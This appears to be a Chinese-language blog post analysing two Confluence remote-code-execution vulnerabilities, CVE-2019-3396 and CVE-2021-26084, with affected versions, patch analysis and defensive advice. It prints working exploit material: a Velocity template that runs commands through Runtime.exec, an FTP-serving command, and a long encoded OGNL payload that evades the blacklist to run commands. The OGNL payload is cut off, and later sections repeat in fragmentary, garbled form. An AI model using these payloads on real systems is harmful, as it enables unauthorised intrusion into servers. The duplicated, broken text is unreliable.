Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
本文详细分析Atlassian Confluence的两个严重漏洞：CVE-2019-3396（Widget Connector宏漏洞）和CVE-2021-26084（OGNL表达式注入漏洞）。这两个漏洞都允许攻击者在未授权情况下实现远程代码执行(RCE)。<\/p>

影响版本<\/h2>

CVE-2019-3396影响版本<\/h3>

version < 6.6.12<\/li>
6.7.0 <= version < 6.12.3<\/li>
6.13.0 <= version < 6.13.3<\/li>

6.14.0 <= version < 6.14.2<\/li> <\/ul>

修复版本<\/strong>：6.6.12, 6.13.3, 6.14.2, 6.15.1, 6.12.3, 6.10.3<\/p>

CVE-2021-26084影响版本<\/h3>

version < 6.13.23<\/li>
6.14.0 ≤ version < 7.4.11<\/li>
7.5.0 ≤ version < 7.11.5<\/li>
7.12.0 ≤ version < 7.12.5<\/li> <\/ul>
CVE-2019-3396漏洞分析<\/h2>
漏洞组件<\/h3>
漏洞存在于Widget Connector插件中，该插件允许用户在Confluence页面中嵌入外部小部件。<\/p>
漏洞原理<\/h3>

Widget Connector宏在处理用户输入的URL时，未正确过滤_template<\/code>参数<\/li>
攻击者可以通过控制_template<\/code>参数来指定Velocity模板文件路径<\/li>
系统会使用ClasspathResourceLoader<\/code>加载指定的模板文件<\/li>
通过精心构造的Velocity模板可实现远程代码执行<\/li> <\/ol> 补丁分析<\/h3> 补丁在widgetconnector-3.1.0.jar<\/code>的WidgetMacro.class<\/code>中添加了过滤函数，从parameters中删除_template<\/code>字段。<\/p> 漏洞利用流程<\/h3> 构造一个包含恶意_template<\/code>参数的Widget Connector宏请求<\/li> 系统调用DefaultRenderManager#getEmbeddedHtml<\/code>处理URL<\/li> 匹配到对应的WidgetRenderer<\/code>（如YoutubeRenderer<\/code>）<\/li> 进入YoutubeRenderer#getEmbeddedHtml<\/code>，其中_template<\/code>参数可控<\/li> 通过ConfigurableResourceManager#loadResource<\/code>加载资源<\/li> 最终使用ClasspathResourceLoader<\/code>加载恶意模板<\/li> <\/ol> 资源加载器分析<\/h3> 系统使用四种资源加载器：<\/p> HibernateResourceLoader<\/code> - ORM资源加载器<\/li> FileResourceLoader<\/code> - 文件读取（有路径遍历防护）<\/li> ClasspathResourceLoader<\/code> - 文件加载（漏洞点）<\/li> DynamicPluginResourceLoader<\/code> - 动态插件资源加载器<\/li> <\/ol> ClasspathResourceLoader#getResourceStream<\/code>最终会调用WebappClassLoaderBase#getResourceAsStream<\/code>，支持file\/https\/ftp等协议。<\/p> 漏洞利用POC<\/h3> 构造恶意Velocity模板（rce.vm）：<\/p> #set ($exp="exp") #set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command)) #set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $exp.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\\A")) #if($scan.hasNext()) $scan.next()#end <\/code><\/pre> 利用FTP协议传输模板文件：<\/p> python -m pyftpdlib -p 8888<\/span> <\/span><\/span><\/code><\/pre>CVE-2021-26084漏洞分析<\/h2> 漏洞原理<\/h3> 这是一个OGNL表达式注入漏洞，攻击者可以通过精心构造的queryString参数注入恶意OGNL表达式，实现远程代码执行。<\/p> 补丁分析<\/h3> 补丁移除了queryString的OGNL取值功能。<\/p> 安全防护机制<\/h3> OgnlValueFinder.class<\/code>会对表达式进行安全检查：<\/p> 编译表达式（解析unicode）<\/li> 使用containsUnsafeExpression<\/code>检查黑名单<\/li> <\/ol> 黑名单包括：<\/p> 限制静态方法、字段、构造方法<\/li> 限制获取classloader（如xxx.class或xxx.getClass()）<\/li> 限制特定变量<\/li> <\/ol> 绕过技术<\/h3> 可以使用反射绕过黑名单限制，并通过unicode编码逃逸expr的单引号。<\/p> 漏洞利用POC<\/h3> queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu002 <\/span><\/span><\/span><\/code><\/pre>防护建议<\/h2> 及时升级到最新修复版本<\/li> 限制外部访问Confluence管理界面<\/li> 实施网络隔离，限制Confluence服务器的出站连接<\/li> 定期检查系统日志，监控可疑活动<\/li> <\/ol> 参考资源<\/h2> Vulhub Confluence CVE-2021-26084<\/a><\/li> Seebug Paper 893<\/a><\/li> Seebug Paper 884<\/a><\/li> <\/ul>

Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析与利用指南<\/h1>

漏洞概述<\/h2> 本文详细分析Atlassian Confluence的两个严重漏洞：CVE-2019-3396（Widget Connector宏漏洞）和CVE-2021-26084（OGNL表达式注入漏洞）。这两个漏洞都允许攻击者在未授权情况下实现远程代码执行(RCE)。<\/p>

影响版本<\/h2>

CVE-2019-3396漏洞分析<\/h2>

漏洞组件<\/h3> 漏洞存在于Widget Connector插件中，该插件允许用户在Confluence页面中嵌入外部小部件。<\/p>

补丁分析<\/h3> 补丁在widgetconnector-3.1.0.jar<\/code>的WidgetMacro.class<\/code>中添加了过滤函数，从parameters中删除_template<\/code>字段。<\/p>

CVE-2021-26084漏洞分析<\/h2>

漏洞原理<\/h3> 这是一个OGNL表达式注入漏洞，攻击者可以通过精心构造的queryString参数注入恶意OGNL表达式，实现远程代码执行。<\/p>

补丁分析<\/h3> 补丁移除了queryString的OGNL取值功能。<\/p>

绕过技术<\/h3> 可以使用反射绕过黑名单限制，并通过unicode编码逃逸expr的单引号。<\/p>

参考资源<\/h2> Vulhub Confluence CVE-2021-26084<\/a><\/li> Seebug Paper 893<\/a><\/li> Seebug Paper 884<\/a><\/li> <\/ul>

漏洞概述<\/h2>
本文详细分析Atlassian Confluence的两个严重漏洞：CVE-2019-3396（Widget Connector宏漏洞）和CVE-2021-26084（OGNL表达式注入漏洞）。这两个漏洞都允许攻击者在未授权情况下实现远程代码执行(RCE)。<\/p>

漏洞组件<\/h3>
漏洞存在于Widget Connector插件中，该插件允许用户在Confluence页面中嵌入外部小部件。<\/p>

补丁分析<\/h3>
补丁在`widgetconnector-3.1.0.jar<\/code>的WidgetMacro.class<\/code>中添加了过滤函数，从parameters中删除_template<\/code>字段。<\/p>`

漏洞原理<\/h3>
这是一个OGNL表达式注入漏洞，攻击者可以通过精心构造的queryString参数注入恶意OGNL表达式，实现远程代码执行。<\/p>

补丁分析<\/h3>
补丁移除了queryString的OGNL取值功能。<\/p>

绕过技术<\/h3>
可以使用反射绕过黑名单限制，并通过unicode编码逃逸expr的单引号。<\/p>

参考资源<\/h2>

Vulhub Confluence CVE-2021-26084<\/a><\/li>
Seebug Paper 893<\/a><\/li>
Seebug Paper 884<\/a><\/li> <\/ul>